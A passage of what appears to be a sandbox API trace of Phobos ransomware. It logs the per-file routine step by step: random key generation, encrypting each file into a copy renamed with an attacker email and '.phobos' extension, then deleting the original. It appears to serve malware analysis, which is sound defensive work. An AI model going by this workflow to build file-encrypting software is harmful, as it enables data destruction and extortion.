lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.929] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.929] CloseHandle (hObject=0x16c) returned 1 [0199.929] CloseHandle (hObject=0x178) returned 1 [0199.929] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv")) returned 1 [0199.930] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.931] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=60928) returned 1 [0199.931] CloseHandle (hObject=0x178) returned 1 [0199.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv")) returned 0x20 [0199.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32868) returned 1 [0200.181] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.181] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xee00, lpOverlapped=0x0) returned 1 [0200.182] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xee10, dwBufLen=0xee10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xee10) returned 1 [0200.183] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xee10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xee10, lpOverlapped=0x0) returned 1 [0200.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0200.185] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.185] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.185] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.185] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0200.185] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.185] CloseHandle (hObject=0x178) returned 1 [0200.185] CloseHandle (hObject=0x160) returned 1 [0200.185] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wI68lpv8Qm0zZ6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wi68lpv8qm0zz6.flv")) returned 1 [0200.186] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.187] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=40327) returned 1 [0200.187] CloseHandle (hObject=0x160) returned 1 [0200.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv")) returned 0x20 [0200.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.188] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.188] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.189] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32868) returned 1 [0200.189] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.189] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x9d87, lpOverlapped=0x0) returned 1 [0200.190] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9d90, dwBufLen=0x9d90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9d90) returned 1 [0200.190] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x9d90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x9d90, lpOverlapped=0x0) returned 1 [0200.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0200.192] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.192] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.192] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.192] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.192] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.192] CloseHandle (hObject=0x160) returned 1 [0200.192] CloseHandle (hObject=0x178) returned 1 [0200.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yShn5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yshn5.mkv")) returned 1 [0200.194] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.195] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=129745) returned 1 [0200.195] CloseHandle (hObject=0x178) returned 1 [0200.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0200.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.195] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.196] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2913) returned 1 [0200.196] CloseHandle (hObject=0x178) returned 1 [0200.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml")) returned 0x20 [0200.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.196] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.197] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=44488) returned 1 [0200.197] CloseHandle (hObject=0x178) returned 1 [0200.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0200.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.197] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.198] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28865) returned 1 [0200.198] CloseHandle (hObject=0x178) returned 1 [0200.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0200.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.198] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=39379) returned 1 [0200.198] CloseHandle (hObject=0x178) returned 1 [0200.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0200.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.199] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.199] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=129745) returned 1 [0200.199] CloseHandle (hObject=0x178) returned 1 [0200.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0200.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.200] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.200] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1897) returned 1 [0200.200] CloseHandle (hObject=0x178) returned 1 [0200.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml")) returned 0x20 [0200.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.201] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.201] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28865) returned 1 [0200.201] CloseHandle (hObject=0x178) returned 1 [0200.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0200.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.203] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1334) returned 1 [0200.203] CloseHandle (hObject=0x178) returned 1 [0200.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml")) returned 0x20 [0200.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 